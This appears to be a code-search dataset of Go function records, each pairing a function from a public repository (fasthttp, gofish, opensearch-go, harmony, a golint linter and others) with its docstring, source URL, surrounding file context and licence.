main bool
problems []Problem
}
func (p *pkg) lint() []Problem {
if err := p.typeCheck(); err != nil {
}
p.scanSortable()
p.main = p.isMain()
for _, f := range p.files {
f.lint()
}
sort.Sort(byPosition(p.problems))
return p.problems
}
type file struct {
pkg *pkg
f *ast.File
fset *token.FileSet
src []byte
filename string
}
func (f *file) isTest() bool { return strings.HasSuffix(f.filename, "_test.go") }
func (f *file) lint() {
f.lintPackageComment()
f.lintImports()
f.lintBlankImports()
f.lintExported()
f.lintNames()
f.lintElses()
f.lintRanges()
f.lintErrorf()
f.lintErrors()
f.lintErrorStrings()
f.lintReceiverNames()
f.lintIncDec()
f.lintErrorReturn()
f.lintUnexportedReturn()
f.lintTimeNames()
f.lintContextKeyTypes()
f.lintContextArgs()
}
type link string
type category string
func (f *file) errorf(n ast.Node, confidence float64, args ...interface{}) *Problem {
pos := f.fset.Position(n.Pos())
if pos.Filename == "" {
pos.Filename = f.filename
}
return f.pkg.errorfAt(pos, confidence, args...)
}
func (p *pkg) errorfAt(pos token.Position, confidence float64, args ...interface{}) *Problem {
problem := Problem{
Position: pos,
Confidence: confidence,
}
if pos.Filename != "" {
if f, ok := p.files[pos.Filename]; ok {
problem.LineText = srcLine(f.src, pos)
}
}
argLoop:
for len(args) > 1 {
switch v := args[0].(type) {
case link:
problem.Link = string(v)
case category:
problem.Category = string(v)
default:
break argLoop
}
args = args[1:]
}
problem.Text = fmt.Sprintf(args[0].(string), args[1:]...)
p.problems = append(p.problems, problem)
return &p.problems[len(p.problems)-1]
}
var newImporter = func(fset *token.FileSet) types.ImporterFrom {
return gcexportdata.NewImporter(fset, make(map[string]*types.Package))
}
func (p *pkg) typeCheck() error {
config := &types.Config{
Error: func(error) {},
Importer: newImporter(p.fset),
}
info := &types.Info{
Types: make(map[ast.Expr]types.TypeAndValue),
Defs: make(map[*ast.Ident]types.Object),
Uses: make(map[*ast.Ident]types.Object),
Scopes: make(map[ast.Node]*types.Scope),
}
var anyFile *file
var astFiles []*ast.File
for _, f := range p.files {
anyFile = f
astFiles = append(astFiles, f.f)
}
pkg, err := config.Check(anyFile.f.Name.Name, p.fset, astFiles, info)
p.typesPkg = pkg
p.typesInfo = info
return err
}
func (p *pkg) typeOf(expr ast.Expr) types.Type {
if p.typesInfo == nil {
return nil
}
return p.typesInfo.TypeOf(expr)
}
func (p *pkg) isNamedType(typ types.Type, importPath, name string) bool {
n, ok := typ.(*types.Named)
if !ok {
return false
}
tn := n.Obj()
return tn != nil && tn.Pkg() != nil && tn.Pkg().Path() == importPath && tn.Name() == name
}
func (p *pkg) scopeOf(id *ast.Ident) *types.Scope {
var scope *types.Scope
if obj := p.typesInfo.ObjectOf(id); obj != nil {
scope = obj.Parent()
}
if scope == p.typesPkg.Scope() {
pos := id.Pos()
for _, f := range p.files {
if f.f.Pos() <= pos && pos < f.f.End() {
scope = p.typesInfo.Scopes[f.f]
break
}
}
}
return scope
}
func (p *pkg) scanSortable() {
p.sortable = make(map[string]bool)
const (
Len = 1 << iota
Less
Swap
)
nmap := map[string]int{"Len": Len, "Less": Less, "Swap": Swap}
has := make(map[string]int)
for _, f := range p.files {
f.walk(func(n ast.Node) bool {
fn, ok := n.(*ast.FuncDecl)
if !ok || fn.Recv == nil || len(fn.Recv.List) == 0 {
return true
}
recv := receiverType(fn)
if i, ok := nmap[fn.Name.Name]; ok {
has[recv] |= i
}
return false
})
}
for typ, ms := range has {
if ms == Len|Less|Swap {
p.sortable[typ] = true
}
}
}
func (p *pkg) isMain() bool {
for _, f := range p.files {
if f.isMain() {
return true
}
}
return false
}
func (f *file) isMain() bool {
if f.f.Name.Name == "main" {
return true
}
return false
}
func (f *file) lintPackageComment() {
if f.isTest() {
return
}
const ref = styleGuideBase + "#package-comments"
prefix := "Package " + f.f.Name.Name + " "
var lastCG *ast.CommentGroup
for _, cg := range f.f.Comments {
if cg.Pos() > f.f.Package {
break
}
lastCG = cg
}
if lastCG != nil && strings.HasPrefix(lastCG.Text(), prefix) {
endPos := f.fset.Position(lastCG.End())
pkgPos := f.fset.Position(f.f.Package)
if endPos.Line+1 < pkgPos.Line {
pos := token.Position{
Filename: endPos.Filename,
Line: endPos.Line + 1,
Column: 1,
}
f.pkg.errorfAt(pos, 0.9, link(ref), category("comments"), "package comment is detached; there should be no blank lines between it and the package statement")
return
}
}
if f.f.Doc == nil {
f.errorf(f.f, 0.2, link(ref), category("comments"), "should have a package comment, unless it's in another file for this package")
return
}
s := f.f.Doc.Text()
if ts := strings.TrimLeft(s, " \t"); ts != s {
f.errorf(f.f.Doc, 1, link(ref), category("comments"), "package comment should not have leading space")
s = ts
}
if !f.pkg.main && !strings.HasPrefix(s, prefix) {
f.errorf(f.f.Doc, 1, link(ref), category("comments"), `package comment should be of the form "%s..."`, prefix)
}
}
func (f *file) lintBlankImports() {
if f.pkg.main || f.isTest() {
return
}
for i, imp := range f.f.Imports {
pos := f.fset.Position(imp.Pos())
if !isBlank(imp.Name) {
continue
}
if i > 0 {
prev := f.f.Imports[i-1]
prevPos := f.fset.Position(prev.Pos())
if isBlank(prev.Name) && prevPos.Line+1 == pos.Line {
continue
}
}
if imp.Doc == nil && imp.Comment == nil {
ref := ""
f.errorf(imp, 1, link(ref), category("imports"), "a blank import should be only in a main or test package, or have a comment justifying it")
}
}
}
func (f *file) lintImports() {
for i, is := range f.f.Imports {
_ = i
if is.Name != nil && is.Name.Name == "." && !f.isTest() {
f.errorf(is, 1, link(styleGuideBase+"#import-dot"), category("imports"), "should not use dot imports")
}
}
}
const docCommentsLink = styleGuideBase + "#doc-comments" | MIT License |
skwair/harmony | voice_connection.go | SwitchVoiceChannel | go | func (c *Client) SwitchVoiceChannel(ctx context.Context, guildID string, channelID string) error {
c.mu.Lock()
defer c.mu.Unlock()
conn, ok := c.voiceConnections[guildID]
if !ok {
return discord.ErrNotConnectedToVoice
}
vsu := &voice.StateUpdate{
State: voice.State{
GuildID: guildID,
ChannelID: &channelID,
SelfMute: conn.State().SelfMute,
SelfDeaf: conn.State().SelfDeaf,
},
}
if err := c.sendPayload(ctx, gatewayOpcodeVoiceStateUpdate, vsu); err != nil {
return err
}
return nil
} | SwitchVoiceChannel can be used to switch from a voice channel to another. It requires an
active voice connection in the guild. You can get one with JoinVoiceChannel. | https://github.com/skwair/harmony/blob/63b40974201c79279b4810bd0c7efbef098bc2e2/voice_connection.go#L73-L94 | package harmony
import (
"context"
"encoding/json"
"errors"
"fmt"
"time"
"github.com/skwair/harmony/discord"
"github.com/skwair/harmony/internal/payload"
"github.com/skwair/harmony/voice"
)
func (c *Client) JoinVoiceChannel(ctx context.Context, guildID, channelID string, mute, deaf bool) (*voice.Connection, error) {
c.mu.Lock()
defer c.mu.Unlock()
if !c.isConnected() {
return nil, discord.ErrGatewayNotConnected
}
if _, ok := c.voiceConnections[guildID]; ok {
return nil, discord.ErrAlreadyConnectedToVoice
}
c.connectingToVoice.Store(true)
defer c.connectingToVoice.Store(false)
vsu := &voice.StateUpdate{
State: voice.State{
GuildID: guildID,
ChannelID: &channelID,
SelfMute: mute,
SelfDeaf: deaf,
},
}
if err := c.sendPayload(ctx, gatewayOpcodeVoiceStateUpdate, vsu); err != nil {
return nil, err
}
state, server, err := getStateAndServer(c.voicePayloads)
if err != nil {
return nil, err
}
conn, err := voice.Connect(ctx, state, server, voice.WithLogger(c.logger))
if err != nil {
return nil, err
}
c.voiceConnections[guildID] = conn
return conn, nil
} | MIT License |
hnlq715/httpmq | vendor/github.com/valyala/fasthttp/server.go | PostBody | go | func (ctx *RequestCtx) PostBody() []byte {
return ctx.Request.Body()
} | PostBody returns POST request body.
The returned value is valid until RequestHandler return. | https://github.com/hnlq715/httpmq/blob/59457eb6745fc57292a83456a65f579d38d45177/vendor/github.com/valyala/fasthttp/server.go#L962-L964 | package fasthttp
import (
"bufio"
"crypto/tls"
"errors"
"fmt"
"io"
"log"
"mime/multipart"
"net"
"os"
"runtime/debug"
"strings"
"sync"
"sync/atomic"
"time"
)
func ServeConn(c net.Conn, handler RequestHandler) error {
v := serverPool.Get()
if v == nil {
v = &Server{}
}
s := v.(*Server)
s.Handler = handler
err := s.ServeConn(c)
s.Handler = nil
serverPool.Put(v)
return err
}
var serverPool sync.Pool
func Serve(ln net.Listener, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.Serve(ln)
}
func ServeTLS(ln net.Listener, certFile, keyFile string, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ServeTLS(ln, certFile, keyFile)
}
func ServeTLSEmbed(ln net.Listener, certData, keyData []byte, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ServeTLSEmbed(ln, certData, keyData)
}
func ListenAndServe(addr string, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServe(addr)
}
func ListenAndServeUNIX(addr string, mode os.FileMode, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServeUNIX(addr, mode)
}
func ListenAndServeTLS(addr, certFile, keyFile string, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServeTLS(addr, certFile, keyFile)
}
func ListenAndServeTLSEmbed(addr string, certData, keyData []byte, handler RequestHandler) error {
s := &Server{
Handler: handler,
}
return s.ListenAndServeTLSEmbed(addr, certData, keyData)
}
type RequestHandler func(ctx *RequestCtx)
type Server struct {
noCopy noCopy
Handler RequestHandler
Name string
Concurrency int
DisableKeepalive bool
ReadBufferSize int
WriteBufferSize int
ReadTimeout time.Duration
WriteTimeout time.Duration
MaxConnsPerIP int
MaxRequestsPerConn int
MaxKeepaliveDuration time.Duration
MaxRequestBodySize int
ReduceMemoryUsage bool
GetOnly bool
LogAllErrors bool
DisableHeaderNamesNormalizing bool
Logger Logger
concurrency uint32
perIPConnCounter perIPConnCounter
serverName atomic.Value
ctxPool sync.Pool
readerPool sync.Pool
writerPool sync.Pool
hijackConnPool sync.Pool
bytePool sync.Pool
}
func TimeoutHandler(h RequestHandler, timeout time.Duration, msg string) RequestHandler {
if timeout <= 0 {
return h
}
return func(ctx *RequestCtx) {
ch := ctx.timeoutCh
if ch == nil {
ch = make(chan struct{}, 1)
ctx.timeoutCh = ch
}
go func() {
h(ctx)
ch <- struct{}{}
}()
ctx.timeoutTimer = initTimer(ctx.timeoutTimer, timeout)
select {
case <-ch:
case <-ctx.timeoutTimer.C:
ctx.TimeoutError(msg)
}
stopTimer(ctx.timeoutTimer)
}
}
func CompressHandler(h RequestHandler) RequestHandler {
return CompressHandlerLevel(h, CompressDefaultCompression)
}
func CompressHandlerLevel(h RequestHandler, level int) RequestHandler {
return func(ctx *RequestCtx) {
h(ctx)
if ctx.Request.Header.HasAcceptEncodingBytes(strGzip) {
ctx.Response.gzipBody(level)
} else if ctx.Request.Header.HasAcceptEncodingBytes(strDeflate) {
ctx.Response.deflateBody(level)
}
}
}
type RequestCtx struct {
noCopy noCopy
Request Request
Response Response
userValues userData
id uint64
lastReadDuration time.Duration
connRequestNum uint64
connTime time.Time
time time.Time
logger ctxLogger
s *Server
c net.Conn
fbr firstByteReader
timeoutResponse *Response
timeoutCh chan struct{}
timeoutTimer *time.Timer
hijackHandler HijackHandler
}
type HijackHandler func(c net.Conn)
func (ctx *RequestCtx) Hijack(handler HijackHandler) {
ctx.hijackHandler = handler
}
func (ctx *RequestCtx) SetUserValue(key string, value interface{}) {
ctx.userValues.Set(key, value)
}
func (ctx *RequestCtx) SetUserValueBytes(key []byte, value interface{}) {
ctx.userValues.SetBytes(key, value)
}
func (ctx *RequestCtx) UserValue(key string) interface{} {
return ctx.userValues.Get(key)
}
func (ctx *RequestCtx) UserValueBytes(key []byte) interface{} {
return ctx.userValues.GetBytes(key)
}
func (ctx *RequestCtx) IsTLS() bool {
_, ok := ctx.c.(*tls.Conn)
return ok
}
func (ctx *RequestCtx) TLSConnectionState() *tls.ConnectionState {
tlsConn, ok := ctx.c.(*tls.Conn)
if !ok {
return nil
}
state := tlsConn.ConnectionState()
return &state
}
type firstByteReader struct {
c net.Conn
ch byte
byteRead bool
}
func (r *firstByteReader) Read(b []byte) (int, error) {
if len(b) == 0 {
return 0, nil
}
nn := 0
if !r.byteRead {
b[0] = r.ch
b = b[1:]
r.byteRead = true
nn = 1
}
n, err := r.c.Read(b)
return n + nn, err
}
type Logger interface {
Printf(format string, args ...interface{})
}
var ctxLoggerLock sync.Mutex
type ctxLogger struct {
ctx *RequestCtx
logger Logger
}
func (cl *ctxLogger) Printf(format string, args ...interface{}) {
ctxLoggerLock.Lock()
msg := fmt.Sprintf(format, args...)
ctx := cl.ctx
req := &ctx.Request
cl.logger.Printf("%.3f #%016X - %s<->%s - %s %s - %s",
time.Since(ctx.Time()).Seconds(), ctx.ID(), ctx.LocalAddr(), ctx.RemoteAddr(), req.Header.Method(), ctx.URI().FullURI(), msg)
ctxLoggerLock.Unlock()
}
var zeroTCPAddr = &net.TCPAddr{
IP: net.IPv4zero,
}
func (ctx *RequestCtx) ID() uint64 {
return ctx.id
}
func (ctx *RequestCtx) Time() time.Time {
return ctx.time
}
func (ctx *RequestCtx) ConnTime() time.Time {
return ctx.connTime
}
func (ctx *RequestCtx) ConnRequestNum() uint64 {
return ctx.connRequestNum
}
func (ctx *RequestCtx) SetConnectionClose() {
ctx.Response.SetConnectionClose()
}
func (ctx *RequestCtx) SetStatusCode(statusCode int) {
ctx.Response.SetStatusCode(statusCode)
}
func (ctx *RequestCtx) SetContentType(contentType string) {
ctx.Response.Header.SetContentType(contentType)
}
func (ctx *RequestCtx) SetContentTypeBytes(contentType []byte) {
ctx.Response.Header.SetContentTypeBytes(contentType)
}
func (ctx *RequestCtx) RequestURI() []byte {
return ctx.Request.Header.RequestURI()
}
func (ctx *RequestCtx) URI() *URI {
return ctx.Request.URI()
}
func (ctx *RequestCtx) Referer() []byte {
return ctx.Request.Header.Referer()
}
func (ctx *RequestCtx) UserAgent() []byte {
return ctx.Request.Header.UserAgent()
}
func (ctx *RequestCtx) Path() []byte {
return ctx.URI().Path()
}
func (ctx *RequestCtx) Host() []byte {
return ctx.URI().Host()
}
func (ctx *RequestCtx) QueryArgs() *Args {
return ctx.URI().QueryArgs()
}
func (ctx *RequestCtx) PostArgs() *Args {
return ctx.Request.PostArgs()
}
func (ctx *RequestCtx) MultipartForm() (*multipart.Form, error) {
return ctx.Request.MultipartForm()
}
func (ctx *RequestCtx) FormFile(key string) (*multipart.FileHeader, error) {
mf, err := ctx.MultipartForm()
if err != nil {
return nil, err
}
if mf.File == nil {
return nil, err
}
fhh := mf.File[key]
if fhh == nil {
return nil, ErrMissingFile
}
return fhh[0], nil
}
var ErrMissingFile = errors.New("there is no uploaded file associated with the given key")
func SaveMultipartFile(fh *multipart.FileHeader, path string) error {
f, err := fh.Open()
if err != nil {
return err
}
defer f.Close()
if ff, ok := f.(*os.File); ok {
return os.Rename(ff.Name(), path)
}
ff, err := os.Create(path)
if err != nil {
return err
}
defer ff.Close()
_, err = copyZeroAlloc(ff, f)
return err
}
func (ctx *RequestCtx) FormValue(key string) []byte {
v := ctx.QueryArgs().Peek(key)
if len(v) > 0 {
return v
}
v = ctx.PostArgs().Peek(key)
if len(v) > 0 {
return v
}
mf, err := ctx.MultipartForm()
if err == nil && mf.Value != nil {
vv := mf.Value[key]
if len(vv) > 0 {
return []byte(vv[0])
}
}
return nil
}
func (ctx *RequestCtx) IsGet() bool {
return ctx.Request.Header.IsGet()
}
func (ctx *RequestCtx) IsPost() bool {
return ctx.Request.Header.IsPost()
}
func (ctx *RequestCtx) IsPut() bool {
return ctx.Request.Header.IsPut()
}
func (ctx *RequestCtx) Method() []byte {
return ctx.Request.Header.Method()
}
func (ctx *RequestCtx) IsHead() bool {
return ctx.Request.Header.IsHead()
}
func (ctx *RequestCtx) RemoteAddr() net.Addr {
addr := ctx.c.RemoteAddr()
if addr == nil {
return zeroTCPAddr
}
return addr
}
func (ctx *RequestCtx) LocalAddr() net.Addr {
addr := ctx.c.LocalAddr()
if addr == nil {
return zeroTCPAddr
}
return addr
}
func (ctx *RequestCtx) RemoteIP() net.IP {
x, ok := ctx.RemoteAddr().(*net.TCPAddr)
if !ok {
return net.IPv4zero
}
return x.IP
}
func (ctx *RequestCtx) Error(msg string, statusCode int) {
ctx.Response.Reset()
ctx.SetStatusCode(statusCode)
ctx.SetContentTypeBytes(defaultContentType)
ctx.SetBodyString(msg)
}
func (ctx *RequestCtx) Success(contentType string, body []byte) {
ctx.SetContentType(contentType)
ctx.SetBody(body)
}
func (ctx *RequestCtx) SuccessString(contentType, body string) {
ctx.SetContentType(contentType)
ctx.SetBodyString(body)
}
func (ctx *RequestCtx) Redirect(uri string, statusCode int) {
u := AcquireURI()
ctx.URI().CopyTo(u)
u.Update(uri)
ctx.redirect(u.FullURI(), statusCode)
ReleaseURI(u)
}
func (ctx *RequestCtx) RedirectBytes(uri []byte, statusCode int) {
s := b2s(uri)
ctx.Redirect(s, statusCode)
}
func (ctx *RequestCtx) redirect(uri []byte, statusCode int) {
ctx.Response.Header.SetCanonical(strLocation, uri)
statusCode = getRedirectStatusCode(statusCode)
ctx.Response.SetStatusCode(statusCode)
}
func getRedirectStatusCode(statusCode int) int {
if statusCode == StatusMovedPermanently || statusCode == StatusFound ||
statusCode == StatusSeeOther || statusCode == StatusTemporaryRedirect {
return statusCode
}
return StatusFound
}
func (ctx *RequestCtx) SetBody(body []byte) {
ctx.Response.SetBody(body)
}
func (ctx *RequestCtx) SetBodyString(body string) {
ctx.Response.SetBodyString(body)
}
func (ctx *RequestCtx) ResetBody() {
ctx.Response.ResetBody()
}
func (ctx *RequestCtx) SendFile(path string) {
ServeFile(ctx, path)
}
func (ctx *RequestCtx) SendFileBytes(path []byte) {
ServeFileBytes(ctx, path)
}
func (ctx *RequestCtx) IfModifiedSince(lastModified time.Time) bool {
ifModStr := ctx.Request.Header.peek(strIfModifiedSince)
if len(ifModStr) == 0 {
return true
}
ifMod, err := ParseHTTPDate(ifModStr)
if err != nil {
return true
}
lastModified = lastModified.Truncate(time.Second)
return ifMod.Before(lastModified)
}
func (ctx *RequestCtx) NotModified() {
ctx.Response.Reset()
ctx.SetStatusCode(StatusNotModified)
}
func (ctx *RequestCtx) NotFound() {
ctx.Response.Reset()
ctx.SetStatusCode(StatusNotFound)
ctx.SetBodyString("404 Page not found")
}
func (ctx *RequestCtx) Write(p []byte) (int, error) {
ctx.Response.AppendBody(p)
return len(p), nil
}
func (ctx *RequestCtx) WriteString(s string) (int, error) {
ctx.Response.AppendBodyString(s)
return len(s), nil
} | MIT License |
stmcginnis/gofish | redfish/drive.go | PCIeFunctions | go | func (drive *Drive) PCIeFunctions() ([]*PCIeFunction, error) {
var result []*PCIeFunction
collectionError := common.NewCollectionError()
for _, pcieFunctionLink := range drive.pcieFunctions {
pcieFunction, err := GetPCIeFunction(drive.Client, pcieFunctionLink)
if err != nil {
collectionError.Failures[pcieFunctionLink] = err
} else {
result = append(result, pcieFunction)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
} | PCIeFunctions references the PCIeFunctions that this drive is associated with. | https://github.com/stmcginnis/gofish/blob/d33a9c3efa5e173d33618942c693c094f587b3ac/redfish/drive.go#L423-L441 | package redfish
import (
"encoding/json"
"reflect"
"github.com/stmcginnis/gofish/common"
)
type EncryptionAbility string
const (
NoneEncryptionAbility EncryptionAbility = "None"
SelfEncryptingDriveEncryptionAbility EncryptionAbility = "SelfEncryptingDrive"
OtherEncryptionAbility EncryptionAbility = "Other"
)
type EncryptionStatus string
const (
UnecryptedEncryptionStatus EncryptionStatus = "Unecrypted"
UnlockedEncryptionStatus EncryptionStatus = "Unlocked"
LockedEncryptionStatus EncryptionStatus = "Locked"
ForeignEncryptionStatus EncryptionStatus = "Foreign"
UnencryptedEncryptionStatus EncryptionStatus = "Unencrypted"
)
type HotspareReplacementModeType string
const (
RevertibleHotspareReplacementModeType HotspareReplacementModeType = "Revertible"
NonRevertibleHotspareReplacementModeType HotspareReplacementModeType = "NonRevertible"
)
type HotspareType string
const (
NoneHotspareType HotspareType = "None"
GlobalHotspareType HotspareType = "Global"
ChassisHotspareType HotspareType = "Chassis"
DedicatedHotspareType HotspareType = "Dedicated"
)
type MediaType string
const (
HDDMediaType MediaType = "HDD"
SSDMediaType MediaType = "SSD"
SMRMediaType MediaType = "SMR"
)
type StatusIndicator string
const (
OKStatusIndicator StatusIndicator = "OK"
FailStatusIndicator StatusIndicator = "Fail"
RebuildStatusIndicator StatusIndicator = "Rebuild"
PredictiveFailureAnalysisStatusIndicator StatusIndicator = "PredictiveFailureAnalysis"
HotspareStatusIndicator StatusIndicator = "Hotspare"
InACriticalArrayStatusIndicator StatusIndicator = "InACriticalArray"
InAFailedArrayStatusIndicator StatusIndicator = "InAFailedArray"
)
type Drive struct {
common.Entity
ODataContext string `json:"@odata.context"`
ODataType string `json:"@odata.type"`
assembly string
AssetTag string
BlockSizeBytes int
CapableSpeedGbs float32
CapacityBytes int64
Description string
EncryptionAbility EncryptionAbility
EncryptionStatus EncryptionStatus
FailurePredicted bool
HotspareReplacementMode HotspareReplacementModeType
HotspareType HotspareType
Identifiers []common.Identifier
IndicatorLED common.IndicatorLED
Location []common.Location
Manufacturer string
MediaType MediaType
Model string
Multipath bool
NegotiatedSpeedGbs float32
Operations []common.Operations
PartNumber string
PhysicalLocation common.Location
PredictedMediaLifeLeftPercent float32
Protocol common.Protocol
Revision string
RotationSpeedRPM float32
SKU string
SerialNumber string
Status common.Status
StatusIndicator StatusIndicator
WriteCacheEnabled bool
chassis string
endpoints []string
EndpointsCount int `json:"[email protected]"`
volumes []string
VolumesCount int
pcieFunctions []string
PCIeFunctionCount int
StoragePoolsCount int
secureEraseTarget string
rawData []byte
}
func (drive *Drive) UnmarshalJSON(b []byte) error {
type temp Drive
type links struct {
Chassis common.Link
Endpoints common.Links
EndpointCount int `json:"[email protected]"`
PCIeFunctions common.Links
PCIeFunctionsCount int `json:"[email protected]"`
StoragePools common.Links
StoragePoolsCount int `json:"[email protected]"`
Volumes common.Links
VolumeCount int `json:"[email protected]"`
}
type Actions struct {
SecureErase struct {
Target string
} `json:"#Drive.SecureErase"`
}
var t struct {
temp
Links links
Actions Actions
Assembly common.Link
}
err := json.Unmarshal(b, &t)
if err != nil {
return err
}
*drive = Drive(t.temp)
drive.assembly = string(t.Assembly)
drive.chassis = string(t.Links.Chassis)
drive.endpoints = t.Links.Endpoints.ToStrings()
drive.EndpointsCount = t.Links.EndpointCount
drive.volumes = t.Links.Volumes.ToStrings()
drive.VolumesCount = t.Links.VolumeCount
drive.pcieFunctions = t.Links.PCIeFunctions.ToStrings()
drive.PCIeFunctionCount = t.Links.PCIeFunctionsCount
drive.secureEraseTarget = t.Actions.SecureErase.Target
drive.rawData = b
return nil
}
func (drive *Drive) Update() error {
original := new(Drive)
err := original.UnmarshalJSON(drive.rawData)
if err != nil {
return err
}
readWriteFields := []string{
"AssetTag",
"HotspareReplacementMode",
"IndicatorLED",
"StatusIndicator",
"WriteCacheEnabled",
}
originalElement := reflect.ValueOf(original).Elem()
currentElement := reflect.ValueOf(drive).Elem()
return drive.Entity.Update(originalElement, currentElement, readWriteFields)
}
func GetDrive(c common.Client, uri string) (*Drive, error) {
resp, err := c.Get(uri)
if err != nil {
return nil, err
}
defer resp.Body.Close()
var drive Drive
err = json.NewDecoder(resp.Body).Decode(&drive)
if err != nil {
return nil, err
}
drive.SetClient(c)
return &drive, nil
}
func ListReferencedDrives(c common.Client, link string) ([]*Drive, error) {
var result []*Drive
if link == "" {
return result, nil
}
links, err := common.GetCollection(c, link)
if err != nil {
return result, err
}
collectionError := common.NewCollectionError()
for _, driveLink := range links.ItemLinks {
drive, err := GetDrive(c, driveLink)
if err != nil {
collectionError.Failures[driveLink] = err
} else {
result = append(result, drive)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
}
func (drive *Drive) Assembly() (*Assembly, error) {
if drive.assembly == "" {
return nil, nil
}
return GetAssembly(drive.Client, drive.assembly)
}
func (drive *Drive) Chassis() (*Chassis, error) {
if drive.chassis == "" {
return nil, nil
}
return GetChassis(drive.Client, drive.chassis)
}
func (drive *Drive) Endpoints() ([]*Endpoint, error) {
var result []*Endpoint
collectionError := common.NewCollectionError()
for _, endpointLink := range drive.endpoints {
endpoint, err := GetEndpoint(drive.Client, endpointLink)
if err != nil {
collectionError.Failures[endpointLink] = err
} else {
result = append(result, endpoint)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
}
func (drive *Drive) Volumes() ([]*Volume, error) {
var result []*Volume
collectionError := common.NewCollectionError()
for _, volumeLink := range drive.volumes {
volume, err := GetVolume(drive.Client, volumeLink)
if err != nil {
collectionError.Failures[volumeLink] = err
} else {
result = append(result, volume)
}
}
if collectionError.Empty() {
return result, nil
}
return result, collectionError
} | BSD 3-Clause New or Revised License |
kava-labs/kava-devnet | blockchain/x/liquidator/client/module_client.go | GetTxCmd | go | func (mc ModuleClient) GetTxCmd() *cobra.Command {
txCmd := &cobra.Command{
Use: "liquidator",
Short: "Liquidator transactions subcommands",
}
txCmd.AddCommand(client.PostCommands(
cli.GetCmd_SeizeAndStartCollateralAuction(mc.cdc),
cli.GetCmd_StartDebtAuction(mc.cdc),
)...)
return txCmd
} | GetTxCmd returns the transaction commands for this module | https://github.com/kava-labs/kava-devnet/blob/55fa119a0e667135152faa3e7c5e837705d36bc0/blockchain/x/liquidator/client/module_client.go#L37-L49 | package client
import (
"github.com/cosmos/cosmos-sdk/client"
"github.com/spf13/cobra"
amino "github.com/tendermint/go-amino"
"github.com/kava-labs/kava-devnet/blockchain/x/liquidator/client/cli"
)
type ModuleClient struct {
storeKey string
cdc *amino.Codec
}
func NewModuleClient(storeKey string, cdc *amino.Codec) ModuleClient {
return ModuleClient{storeKey, cdc}
}
func (mc ModuleClient) GetQueryCmd() *cobra.Command {
queryCmd := &cobra.Command{
Use: "liquidator",
Short: "Querying commands for the liquidator module",
}
queryCmd.AddCommand(client.GetCommands(
cli.GetCmd_GetOutstandingDebt(mc.storeKey, mc.cdc),
)...)
return queryCmd
} | Apache License 2.0 |
opensearch-project/opensearch-go | opensearchapi/api.indices.get_settings.go | WithContext | go | func (f IndicesGetSettings) WithContext(v context.Context) func(*IndicesGetSettingsRequest) {
return func(r *IndicesGetSettingsRequest) {
r.ctx = v
}
} | WithContext sets the request context. | https://github.com/opensearch-project/opensearch-go/blob/fb1709a85d8d92ab3fcd153d54a561965e9c4f36/opensearchapi/api.indices.get_settings.go#L194-L198 | package opensearchapi
import (
"context"
"net/http"
"strconv"
"strings"
"time"
)
func newIndicesGetSettingsFunc(t Transport) IndicesGetSettings {
return func(o ...func(*IndicesGetSettingsRequest)) (*Response, error) {
var r = IndicesGetSettingsRequest{}
for _, f := range o {
f(&r)
}
return r.Do(r.ctx, t)
}
}
type IndicesGetSettings func(o ...func(*IndicesGetSettingsRequest)) (*Response, error)
type IndicesGetSettingsRequest struct {
Index []string
Name []string
AllowNoIndices *bool
ExpandWildcards string
FlatSettings *bool
IgnoreUnavailable *bool
IncludeDefaults *bool
Local *bool
MasterTimeout time.Duration
Pretty bool
Human bool
ErrorTrace bool
FilterPath []string
Header http.Header
ctx context.Context
}
func (r IndicesGetSettingsRequest) Do(ctx context.Context, transport Transport) (*Response, error) {
var (
method string
path strings.Builder
params map[string]string
)
method = "GET"
path.Grow(1 + len(strings.Join(r.Index, ",")) + 1 + len("_settings") + 1 + len(strings.Join(r.Name, ",")))
if len(r.Index) > 0 {
path.WriteString("/")
path.WriteString(strings.Join(r.Index, ","))
}
path.WriteString("/")
path.WriteString("_settings")
if len(r.Name) > 0 {
path.WriteString("/")
path.WriteString(strings.Join(r.Name, ","))
}
params = make(map[string]string)
if r.AllowNoIndices != nil {
params["allow_no_indices"] = strconv.FormatBool(*r.AllowNoIndices)
}
if r.ExpandWildcards != "" {
params["expand_wildcards"] = r.ExpandWildcards
}
if r.FlatSettings != nil {
params["flat_settings"] = strconv.FormatBool(*r.FlatSettings)
}
if r.IgnoreUnavailable != nil {
params["ignore_unavailable"] = strconv.FormatBool(*r.IgnoreUnavailable)
}
if r.IncludeDefaults != nil {
params["include_defaults"] = strconv.FormatBool(*r.IncludeDefaults)
}
if r.Local != nil {
params["local"] = strconv.FormatBool(*r.Local)
}
if r.MasterTimeout != 0 {
params["master_timeout"] = formatDuration(r.MasterTimeout)
}
if r.Pretty {
params["pretty"] = "true"
}
if r.Human {
params["human"] = "true"
}
if r.ErrorTrace {
params["error_trace"] = "true"
}
if len(r.FilterPath) > 0 {
params["filter_path"] = strings.Join(r.FilterPath, ",")
}
req, err := newRequest(method, path.String(), nil)
if err != nil {
return nil, err
}
if len(params) > 0 {
q := req.URL.Query()
for k, v := range params {
q.Set(k, v)
}
req.URL.RawQuery = q.Encode()
}
if len(r.Header) > 0 {
if len(req.Header) == 0 {
req.Header = r.Header
} else {
for k, vv := range r.Header {
for _, v := range vv {
req.Header.Add(k, v)
}
}
}
}
if ctx != nil {
req = req.WithContext(ctx)
}
res, err := transport.Perform(req)
if err != nil {
return nil, err
}
response := Response{
StatusCode: res.StatusCode,
Body: res.Body,
Header: res.Header,
}
return &response, nil
} | Apache License 2.0 |
kubernetes-sigs/cluster-addons | installer/vendor/k8s.io/apimachinery/pkg/watch/watch.go | Error | go | func (f *RaceFreeFakeWatcher) Error(errValue runtime.Object) {
f.Lock()
defer f.Unlock()
if !f.Stopped {
select {
case f.result <- Event{Error, errValue}:
return
default:
panic(fmt.Errorf("channel full"))
}
}
} | Error sends an Error event. | https://github.com/kubernetes-sigs/cluster-addons/blob/a8622ef8b343e3b511ecc2058c2b15058b481ddb/installer/vendor/k8s.io/apimachinery/pkg/watch/watch.go#L250-L261 | package watch
